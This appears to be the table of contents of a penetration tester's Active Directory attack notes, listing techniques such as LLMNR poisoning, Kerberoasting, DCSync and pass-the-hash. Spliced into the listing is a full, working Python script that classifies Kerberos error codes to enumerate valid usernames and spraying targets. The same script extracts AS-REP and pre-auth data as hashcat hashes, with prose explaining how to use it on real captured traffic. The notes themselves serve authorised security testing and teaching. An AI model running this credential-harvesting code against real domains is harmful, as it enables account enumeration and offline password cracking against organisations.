Active Directory
Consider also taking a look at my Active Directory Attack Map.
While it doesn't cover every possible attack path and isn't as elaborate as some other mind maps, it visualizes much of the information found in this book.
Initial Attack Vectors
Internal: Attack vectors that are ideal for internal penetration tests, where the att...
Enumerating Hosts and Identifying the Domain Controllers
Enumerating Live Hosts Internal ARP-Scan Since this is an internal assessment, Kali is on the ...
LLMNR Poisoning (Internal)
Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local...
SMB Relay (Internal/External)
Note: Network Environment This attack works best in a flat network. However, as long as the atta...
IPv6 DNS Spoofing (Internal)
Note: Network Environment This spoofing attack works by sending a router advertisement to mul...
NULL Session Enumeration (Internal/External)
NULL Session LDAP, SMB, and RPC may allow a user to authenticate to the service without providin...
Using Faketime for Ad-Hoc Kerberos Authentication
Installing Faketime sudo apt install faketime faketime -h This will run the specified 'progr...
Kerberos Pre-Auth Username Enumeration
How it Works We can send a TGT request (AS-REQ) without pre-authentication data to the Ke...
AS-REP Roasting (Internal/External)
AS-REP Roasting If Kerberos pre-authentication is disabled on a user account in Active Directory...
Passback Attacks (Internal/External)
What's the Flaw? Usually involves an insecure device, such as a printer or multifunction device -...
PrintNightmare (Internal/External)
Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scannin...
NTLM Credential Stuffing (Internal/External)
NTLM Basic Authentication Could obtain a list of usernames via OSINT, or via something like RI...
Post Exploitation: Enumeration
PowerShell AD Module on Any Domain Host as Any User
Borrow a DLL Normally, one must install RSAT (Remote Server Administration Tools) on a host to m...
Dumping DNS Records with adidnsdump
Active Directory Integrated DNS Dump (adidnsdump) GitHub Repository Installation python3 -m pi...
CrackMapExec
When to Use Useful post-compromise if you've dumped hashes from SAM or LSASS or obtained clearte...
PowerView
Overview A set of PowerShell functions that can be used to enumerate Active Directory. Part of th...
BloodHound
1. Installation sudo apt install -y neo4j bloodhound 2. Setup sudo neo4j console & Navi...
Remote Bloodhound
GitHub Repo Prerequisites impacket ldap3 dnspython Installation python3 -m pip insta...
LdapDomainDump
When to Use You'll know when you've found a domain controller, because it will have ...
LdapSearch
When to Use You'll know when you've found a domain controller, because it will have several por...
Enum4Linux
Details Enum4linux is a tool for enumerating information from Windows and Samba systems. It at...
GetADUsers.py
When to Use Helpful in post-compromise enumeration. If you've compromised a domain-joined host, ...
GetUserSPNs.py
When to Use Useful in post-compromise enumeration. If you acquire user passwords or hashes for a...
Manual Enumeration
net.exe Drawbacks net does not show nested groups net only shows up to 10 groups even if a u...
Extracting Kerberos AS-REQ Pre-Auth Hashes from PCAPs
PCAP Analysis Note the existence of KRB5 protocol traffic on tcp/88, which is further identifi...
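The three Kerberos sections above (pre-auth username enumeration, AS-REP roasting, and pulling pre-auth material out of tcp/88 traffic) all come down to reading a few fields out of DER-encoded KRB5 messages. The following is an added example, not code from these notes or from any of the tools they reference: a minimal DER walker that (1) maps the KDC error code returned for an AS-REQ sent without pre-auth to an enumeration verdict, (2) turns an AS-REP for a pre-auth-disabled account into a hashcat 18200 line, and (3) extracts the PA-ENC-TIMESTAMP blob from an AS-REQ in hashcat 7500/19900 form. The realm, user names and cipher bytes are constructed sample data, built with the same encoder, so the script runs offline; it only handles the single-byte tags and etypes 23/18 that these attacks involve.

```python
# Added example (not from the original notes): minimal DER walker for the
# Kerberos messages on tcp/88 (RFC 4120). Covers three uses: KDC error code
# -> username-enumeration verdict, AS-REP -> hashcat 18200, AS-REQ
# PA-ENC-TIMESTAMP -> hashcat 7500 (etype 23) / 19900 (etype 18).
# All realms, users and cipher bytes below are constructed sample data.

# ---- DER encoding, used only to build the constructed samples ----
def _len(n):
    if n < 0x80:
        return bytes([n])
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(raw)]) + raw

def tlv(tag, body): return bytes([tag]) + _len(len(body)) + body
def ctx(n, body): return tlv(0xA0 | n, body)            # context tag [n], EXPLICIT
def integer(v): return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))
def gstr(s): return tlv(0x1B, s.encode())                # KerberosString = GeneralString
def seq(*items): return tlv(0x30, b"".join(items))
def enc_data(etype, cipher): return seq(ctx(0, integer(etype)), ctx(2, tlv(0x04, cipher)))
def principal(*parts):                                   # PrincipalName, NT-PRINCIPAL = 1
    return seq(ctx(0, integer(1)), ctx(1, seq(*[gstr(p) for p in parts])))
def frame(msg): return len(msg).to_bytes(4, "big") + msg  # tcp/88 4-byte length prefix

# ---- DER decoding ----
def parse_tlv(buf, off=0):
    tag, ln, off = buf[off], buf[off + 1], off + 2
    if ln & 0x80:                                        # long-form length
        n = ln & 0x7F
        ln, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + ln], off + ln

def children(body):
    out, off = [], 0
    while off < len(body):
        tag, val, off = parse_tlv(body, off)
        out.append((tag, val))
    return out

def field(body, n):                                      # contents of [n] in a SEQUENCE body
    for tag, val in children(body):
        if tag == 0xA0 | n:
            return val
    raise KeyError(f"field [{n}] not present")

def prim(val): return parse_tlv(val)[1]                  # element inside an EXPLICIT tag
def as_int(val): return int.from_bytes(prim(val), "big", signed=True)

def app_body(framed, app):                               # framed msg -> [APPLICATION app] body
    tag, val, _ = parse_tlv(framed[4:])
    if tag != 0x60 | app:
        raise ValueError(f"expected APPLICATION {app}, got tag {tag:#x}")
    return prim(val)

def name_of(pn):                                         # PrincipalName -> "part/part"
    return "/".join(v.decode() for _, v in children(prim(field(prim(pn), 1))))

# ---- 1. KRB-ERROR codes that reveal account state (RFC 4120 section 7.5.9) ----
ERRORS = {6: "user does not exist (KDC_ERR_C_PRINCIPAL_UNKNOWN)",
          18: "user exists but is disabled or locked (KDC_ERR_CLIENT_REVOKED)",
          24: "user exists, wrong pre-auth secret (KDC_ERR_PREAUTH_FAILED)",
          25: "user exists, pre-auth required (KDC_ERR_PREAUTH_REQUIRED)"}

def classify_krb_error(framed):
    code = as_int(field(app_body(framed, 30), 6))
    return code, ERRORS.get(code, "other KDC error")

# ---- 2. AS-REP roast: hashcat 18200 line, RC4-HMAC (etype 23) only ----
def asrep_roast_hash(framed):
    body = app_body(framed, 11)
    realm, user = prim(field(body, 3)).decode(), name_of(field(body, 4))
    enc = prim(field(body, 6))
    etype, cipher = as_int(field(enc, 0)), prim(field(enc, 2))
    if etype != 23:
        raise ValueError(f"etype {etype} is not handled in this example")
    # RC4 enc-part = 16-byte HMAC-MD5 checksum, then the ciphertext
    return f"$krb5asrep$23${user}@{realm}:{cipher[:16].hex()}${cipher[16:].hex()}"

# ---- 3. AS-REQ PA-ENC-TIMESTAMP -> hashcat 7500 (etype 23) or 19900 (etype 18) ----
def asreq_preauth_hash(framed):
    body = app_body(framed, 10)                          # AS-REQ numbers its fields [1]..[4]
    req = prim(field(body, 4))                           # KDC-REQ-BODY: cname [1], realm [2]
    user, realm = name_of(field(req, 1)), prim(field(req, 2)).decode()
    for _, pa in children(prim(field(body, 3))):         # SEQUENCE OF PA-DATA
        if as_int(field(pa, 1)) != 2:                    # padata-type 2 = PA-ENC-TIMESTAMP
            continue
        enc = prim(prim(field(pa, 2)))                   # OCTET STRING wraps EncryptedData
        etype, cipher = as_int(field(enc, 0)), prim(field(enc, 2))
        if etype == 23:                                  # salt field is not used for RC4
            return f"$krb5pa$23${user}${realm}${realm}${cipher.hex()}"
        if etype == 18:                                  # cracker derives the AES salt itself
            return f"$krb5pa$18${user}${realm}${cipher.hex()}"
    return None

# ---- constructed samples, not captured traffic ----
REALM = "CORP.LOCAL"
KRB_ERROR_SAMPLE = frame(tlv(0x7E, seq(
    ctx(0, integer(5)), ctx(1, integer(30)), ctx(4, tlv(0x18, b"20240101000000Z")),
    ctx(5, integer(0)), ctx(6, integer(25)), ctx(9, gstr(REALM)), ctx(10, principal("krbtgt", REALM)))))
AS_REP_SAMPLE = frame(tlv(0x6B, seq(                     # ticket [5] omitted, not read here
    ctx(0, integer(5)), ctx(1, integer(11)), ctx(3, gstr(REALM)), ctx(4, principal("svc_backup")),
    ctx(6, enc_data(23, bytes(range(16)) + b"\xaa" * 40)))))
AS_REQ_SAMPLE = frame(tlv(0x6A, seq(
    ctx(1, integer(5)), ctx(2, integer(10)),
    ctx(3, seq(seq(ctx(1, integer(2)), ctx(2, tlv(0x04, enc_data(23, b"\xbb" * 52)))))),
    ctx(4, seq(ctx(0, tlv(0x03, b"\x00\x40\x81\x00\x10")), ctx(1, principal("j.doe")),
               ctx(2, gstr(REALM)), ctx(3, principal("krbtgt", REALM)))))))

if __name__ == "__main__":
    print(classify_krb_error(KRB_ERROR_SAMPLE))
    print(asrep_roast_hash(AS_REP_SAMPLE))
    print(asreq_preauth_hash(AS_REQ_SAMPLE))
```

On real traffic, feed each function the TCP payload of one KDC message (the 4-byte length prefix included); a tool that reassembles the stream, such as a scapy or tshark export, gives you exactly that. The error-code table is the whole basis of pre-auth username enumeration: a KDC that answers code 6 for unknown names and 25 for known ones tells you which names are valid before any password is tried, and code 18 versus 24 lets a spraying run skip disabled accounts.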
Post Exploitation: Attacks
Mimikatz
Overview https://github.com/gentilkiwi/mimikatz There are various spin-offs of the Mimikatz pro...
Dumping Passwords from Windows Credential Manager
Credential Enumeration cmdkey /list In reverse shells, I have noticed that it's impossible to s...
Dumping Hashes without Mimikatz
Post-Compromise on Target Lsass Process Dump Sysinternals ProcDump Download ProcDump here # D...
Impacket-Addcomputer
When to Use Could be used post-compromise upon enumerating the ms-DS-MachineAccountQuota policy....
DCSync
DCSync Overview DCSync abuses directory replication, a legitimate function of Active Directory environments where a domain...
Pass the Password
Overview Cracked a hash or discovered a password for a domain user. Use the password and crackma...
Pass the Hash
Overview Dumped the SAM or LSA and now have hashes for domain or local users. Use the hash and...
Pass the Ticket
Anatomy of a Kerberos Ticket [0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-ZA.TRYHACKME.COM.kirb...
Pass the Key
Kerberos Encryption Keys Policies on the domain controller will dictate which encryption algorit...
Password & Credential Brute Force
User Enumeration You have enumerated users with one of the methods defined here: CrackMapExec...
Token Impersonation
Overview Tokens are temporary keys that allow a user to perform actions on a system or network w...
Spawn Processes as Other Users
RunasCs.exe Project GitHub https://github.com/antonioCoco/RunasCs/releases Example Usage Spaw...
Kerberoasting
Overview The attacker uses a known username and password of a user on a domain. A typical Kerbe...
Group Policy Preferences (GPP)
Overview GPP allows admins to create policies with embedded credentials. The credentials are enc...
PrintNightmare
Local Privilege Escalation https://github.com/calebstewart/CVE-2021-1675
ZeroLogon
Caution This can potentially break a domain controller, because the attack temporaril...
xfreerdp
Usage and Help Display the xfreerdp man page man xfreerdp Display the xfreerdp help output on ...